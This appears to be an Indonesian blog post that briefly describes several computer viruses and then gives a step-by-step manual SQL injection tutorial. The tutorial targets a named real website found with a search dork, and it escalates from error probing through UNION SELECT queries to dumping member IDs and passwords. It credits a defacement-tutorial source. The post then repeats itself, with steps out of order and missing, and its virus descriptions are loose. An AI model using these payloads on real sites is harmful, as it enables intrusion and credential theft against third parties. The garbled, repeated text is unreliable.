Virus Terbaru Dan Dampak Virus Tersebut Tehadap Komputer Serta Cara SQL Injection Manual
Virus Terbaru Dan Dampak Virus Tersebut Tehadap Komputer
Berikut Virus atau seragan terbaru terhadap komputer dan dampaknya, diantaranya :
1. Virus Ransomeware
Virus Ransomware menyebabkan data-data dikomputer dicuri oleh si pengguna virus tersebut dan menguncinya, sampai si korban memperoleh kunci deskripsi dari pemilik virus meminta sejumlah uang tebusan.
2. Virus Ground
Virus Ground meyebabkan sebuah aplikasi yang berformat (.exe) tidak dapat berjalan karena file asli aplikasi yang berformat (.exe) di hide oleh virus tersebut.Ciri aplikasi yang terkena virus ini adalah aplikasi tersebut berkapasitas 522kb atau lebih sederhananya lagi aplikasi tersebut berawalan huruf (g) seperti contohnya mozila.exe menjadi gmozila.exe.
3. Virus Shortcut
Virus Shorcut hampir sama dengan virus ground namun yang membedakan, virus ini menjadikan sebuah file berformat apa saja menjadi sebuah shorcut yang berkapasitas 1kb aja dan aplikasi atau file yang sudah terkena virus shorcut tidak bisa dibuka atau dijalankan di windows.
Cara SQL Injection Manual
1. Cari website yang terdapat kelemahannya atau celah dengan mengunjungi http://sqli20162016.blogspot.co.id atau mencari dengan kata kunci "inurl:php?id= site:id". Contoh http://www.competent-maruti.com/price/price-by-model.php?id=14 seperti gambar dibawah.
2. Kemudian tambahkan tanda quotes( ' ) dibelakang url tadi, maka url menjadi http://www.competent-maruti.com/price/price-by-model.php?id=14' . Tampilan pun akan berubah seperti gambar berikut dengan pemberitahuan SQL syntax error.
3. Kemudian hapus tanda quotes dan tambahkan dibelakang url "order by 1--" (angka sebelum -- dapat diganti sampai terdapat pemberitahuan dalam website unknown column). Maka url menjadi http://www.competent-maruti.com/price/price-by-model.php?id=14 order by 4--. Maka akan seperti berikut.
4. Kemudian hapus order by 4-- dan tambahkan dibelakang url "union select 1,2,3--" dan tambahkan - sebelum angka 4. Maka url menjadi http://www.competent-maruti.com/price/price-by-model.php?id=-14 union select 1,2,3--. Maka akan seperti berikut.
5. Kemudian hapus angka 2 dan tambahkan ditempat angka 2 tadi "@@version" dan tambahkan
Maka url menjadi http://www.competent-maruti.com/price/price-by-model.php?id=-14 union select 1,@@version,3--. Maka akan seperti berikut.
6. Kemudian hapus @@version dan tambahkan ditempat @@version tadi "group_concat(table_name)" lalu tambahkan perintah sebelum -- from information_schema.tables where table_schema=database(). Maka url menjadi
http://www.competent-maruti.com/price/price-by-model.php?id=-14 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--. Maka akan seperti berikut.
7. Kemudian cari tbl yang berhubungan dengan user dan password. Lalu hapus group_concat(table_name) dan tambahkan ditempat tadi "group_concat(column_name)", from information_schema.tables where table_schema=database()-- menjadi from information_schema.columns where table_name=CHAR(116,98,108,109,101,109,98,101,114)--. Char disini adalah angka decimal dari tblmember. Maka akan seperti berikut.
8. Lalu ganti group_concat(column_name) menjadi database yang diinginkan seperti "group_concat(Memberid,0x3a,password)" dan ganti from information_schema.columns where table_name=CHAR(116,98,108,109,101,109,98,101,114)-- menjadi from tblmember--. . Maka akan tampil user id dan password, namun jika tidak tampil user id dan password maka halaman itu tidak memiliki isi database user dan password. seperti gambar berikut.
Sekian dari saya, mohon maaf bila ada kesalahan. Semoga bermanfaat dan sampai jumpa lagi.
Sumber : http://www.idiot-attacker.com/2015/12/tutorial-deface-dengan-sqli-manual.html
Berikut Virus atau seragan terbaru terhadap komputer dan dampaknya, diantaranya :
1. Virus Ransomeware
Virus Ransomware menyebabkan data-data dikomputer dicuri oleh si pengguna virus tersebut dan menguncinya, sampai si korban memperoleh kunci deskripsi dari pemilik virus meminta sejumlah uang tebusan.
2. Virus Ground
Virus Ground meyebabkan sebuah aplikasi yang berformat (.exe) tidak dapat berjalan karena file asli aplikasi yang berformat (.exe) di hide oleh virus tersebut.Ciri aplikasi yang terkena virus ini adalah aplikasi tersebut berkapasitas 522kb atau lebih sederhananya lagi aplikasi tersebut berawalan huruf (g) seperti contohnya mozila.exe menjadi gmozila.exe.
3. Virus Shortcut
Virus Shorcut hampir sama dengan virus ground namun yang membedakan, virus ini menjadikan sebuah file berformat apa saja menjadi sebuah shorcut yang berkapasitas 1kb aja dan aplikasi atau file yang sudah terkena virus shorcut tidak bisa dibuka atau dijalankan di windows.
Cara SQL Injection Manual
1. Cari website yang terdapat kelemahannya atau celah dengan mengunjungi http://sqli20162016.blogspot.co.id atau mencari dengan kata kunci "inurl:php?id= site:id". Contoh http://www.competent-maruti.com/price/price-by-model.php?id=14 seperti gambar dibawah.
3. Kemudian hapus tanda quotes dan tambahkan dibelakang url "order by 1--" (angka sebelum -- dapat diganti sampai terdapat pemberitahuan dalam website unknown column). Maka url menjadi http://www.competent-maruti.com/price/price-by-model.php?id=14 order by 4--. Maka akan seperti berikut.
Maka url menjadi http://www.competent-maruti.com/price/price-by-model.php?id=-14 union select 1,@@version,3--. Maka akan seperti berikut.
http://www.competent-maruti.com/price/price-by-model.php?id=-14 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--. Maka akan seperti berikut.
Sumber : http://www.idiot-attacker.com/2015/12/tutorial-deface-dengan-sqli-manual.html
Komentar
Posting Komentar